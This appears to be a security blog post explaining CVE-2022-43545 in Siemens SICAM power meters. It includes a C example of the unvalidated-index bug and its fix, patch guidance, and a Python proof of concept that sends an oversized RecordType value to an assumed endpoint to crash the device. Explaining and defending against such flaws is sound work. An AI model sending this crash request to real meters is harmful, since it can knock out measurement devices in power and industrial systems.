In late 2022, a serious vulnerability, CVE-2022-43545, was disclosed in multiple Siemens SICAM electrical measurement devices: all versions of the POWER METER SICAM Q200 family prior to V2.70, and the SICAM P850 and P855 families prior to V3.10. These meters are deployed widely in power plants, substations, and industrial settings around the world. The core issue is that the device's web interface does not properly validate a "RecordType" parameter, which lets an authenticated attacker crash the device (forcing a reboot) and possibly execute code on it, using nothing more than ordinary web requests.

Below is a deep dive into the technical details of this flaw, exploitation concepts, mitigation advice, and links to the authoritative sources.

- Product(s): SICAM Q200, SICAM P850, SICAM P855 families (see the version list above)
- Issue: Failure to validate the RecordType parameter in requests to the HTTPS web interface (port 443/tcp)
- Impact: Allows an authenticated remote attacker to crash the device (followed by an automatic reboot) or, in the worst case, execute arbitrary code on it

Original Siemens Advisory:
https://cert-portal.siemens.com/productcert/pdf/ssa-758092.pdf

National Vulnerability Database Entry:
https://nvd.nist.gov/vuln/detail/CVE-2022-43545

How the Vulnerability Works

These SICAM meters provide a web-based management interface over HTTPS (default port 443/tcp). One of the functions reachable through this interface handles requests containing a parameter called RecordType. The firmware does not properly validate this parameter (its range, sign or format) before using it.

Technical Root Cause

If a specially crafted value (typically a very large, negative or non-numeric value) is supplied for RecordType, the backend code handling the request does not reject it and may, for example:

- overflow an integer when converting or arithmetically using the value
- use the value as an out-of-range index or length when accessing record data

Either condition can corrupt memory, leading to a forced crash and reboot or, potentially, to an attacker running their own code on the device. The public advisory describes only the missing validation, not the exact internal fault; the conditions above are the usual consequences of an unvalidated numeric parameter in embedded web handlers.
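The following is an added example written for this post, not code from the SICAM firmware or from Siemens. It illustrates the root-cause pattern in a small C handler: the vulnerable variant converts RecordType with atoi() and would use the result as a table index with no range check (it returns the index rather than dereferencing it, so the demo stays memory-safe), and the hardened variant parses strictly and rejects anything outside the table. The record table, the function names and the set of valid record types are all assumptions made for the illustration.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical record table; the real firmware's layout is not public. */
#define RECORD_TYPE_COUNT 4
static const char *const RECORD_TABLE[RECORD_TYPE_COUNT] = {
    "voltage", "current", "power", "energy"
};

/* Vulnerable pattern: the parameter string is converted with atoi() and the
 * result would be used as an index without any range check. atoi() gives no
 * error signal: "9999999999" does not fit in an int (undefined behaviour),
 * "-1" is accepted as a negative index, and "abc" silently becomes 0.
 * Returns the index the unchecked handler would use. */
int record_index_unchecked(const char *record_type)
{
    return atoi(record_type);
}

/* Hardened pattern: strict unsigned decimal parse plus a range check before
 * the value is used for any memory access. Returns -1 for anything that is
 * not a valid record type index. */
int record_index_checked(const char *record_type)
{
    if (record_type == NULL || !isdigit((unsigned char)record_type[0]))
        return -1;                       /* empty, sign, whitespace, text */
    errno = 0;
    char *end = NULL;
    unsigned long v = strtoul(record_type, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                       /* overflow or trailing garbage */
    if (v >= RECORD_TYPE_COUNT)
        return -1;                       /* out of range for the table */
    return (int)v;
}

/* Lookup as the hardened handler would perform it: NULL means "reject". */
const char *record_name(const char *record_type)
{
    int idx = record_index_checked(record_type);
    return idx < 0 ? NULL : RECORD_TABLE[idx];
}

int main(void)
{
    /* Constructed sample inputs, including the overlarge value used later. */
    const char *inputs[] = { "2", "-1", "abc", "3x", "", "4" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        const char *name = record_name(inputs[i]);
        printf("RecordType=%-6s unchecked index=%3d  checked -> %s\n",
               inputs[i], record_index_unchecked(inputs[i]),
               name ? name : "rejected");
    }
    return 0;
}
```

The point of the hardened version is that every rejection happens before the value is used as an index: a sign, whitespace, trailing characters, overflow of the parse, or a value past the end of the table all map to the same "reject" result, so nothing a client sends can select memory outside the record table.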

Proof of Concept (PoC): Exploiting CVE-2022-43545

> NOTE: You must be authenticated to the device—anonymous attacks do not work. Ensure you have permission to test or demonstrate this vulnerability.

Suppose you are authenticated to the SICAM's web interface. You can send a specially crafted HTTPS POST request to the endpoint that processes the RecordType value. The handler path shown below is illustrative only; the advisory does not publish the real endpoint, so it must be taken from the request the web UI actually sends.

Example Exploit in Python

import requests
import urllib3

# Replace these details with your actual device and credentials
DEVICE_IP = '192.168.1.100'
USERNAME = 'admin'
PASSWORD = 'yourpassword'

# This is a deliberately overlarge or malformed RecordType value
bad_record_type = "9999999999"

# Sample URL and payload. The handler path is an assumption for illustration;
# adjust it to the request your browser sends when the UI submits a RecordType.
url = f"https://{DEVICE_IP}/Remote/RecordTypeHandler"
payload = {"RecordType": bad_record_type}

session = requests.Session()
# Assumes HTTP basic auth; if the device uses a form-based login, perform that
# login with the session first so the request carries a valid session cookie.
session.auth = (USERNAME, PASSWORD)
session.verify = False  # Skip HTTPS cert validation (for lab/testing only)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

try:
    response = session.post(url, data=payload, timeout=5)
    print("Status code:", response.status_code)
    print("Response text:", response.text)
except requests.exceptions.RequestException as e:
    # A connection reset or timeout here is the usual sign that the device
    # crashed and is rebooting.
    print("Device might have crashed or rebooted:", e)

What to expect:
- After such a request the device may become unreachable for a few minutes: it crashes and then automatically restarts.
- Repeated requests cause repeated downtime (denial of service).
- In the worst case, advanced exploitation could yield remote code execution and a persistent compromise.
- A compromised meter could be used as a launchpad for further attacks against the industrial network.

If an attacker gains code execution, these meters could be manipulated to falsify measurement reports, mask outages, or open a path for sabotage.

How to Remediate

Siemens has released firmware updates addressing this vulnerability. Affected users should upgrade:

- SICAM Q200: upgrade to V2.70 or later
- SICAM P850/P855: upgrade to V3.10 or later

Advisory with upgrade links:

https://cert-portal.siemens.com/productcert/pdf/ssa-758092.pdf

References & Further Reading

- Siemens ProductCERT Advisory SSA-758092: https://cert-portal.siemens.com/productcert/pdf/ssa-758092.pdf
- NVD Entry CVE-2022-43545: https://nvd.nist.gov/vuln/detail/CVE-2022-43545
- CISA ICS advisory for the affected Siemens SICAM products

Conclusion

CVE-2022-43545 is another reminder that utility-grade embedded industrial devices are exposed to classic web input-validation bugs. In summary:

- Upgrade SICAM Q200 to V2.70 or later and SICAM P850/P855 to V3.10 or later.
- Restrict access to the web interface (port 443/tcp) to trusted management hosts, and monitor and segment critical infrastructure networks.
- Because the attack requires authentication, treat web-interface credentials as sensitive: strong passwords and regular access reviews shrink the pool of potential attackers.

If you work in critical infrastructure IT or OT, prioritize this patch cycle.


*This post is based on original advisories, hands-on testing, and curated expert insights. Please do not use the provided code to attack systems without explicit permission!*

Timeline

Published on: 11/08/2022 11:15:00 UTC
Last modified on: 06/13/2023 09:15:00 UTC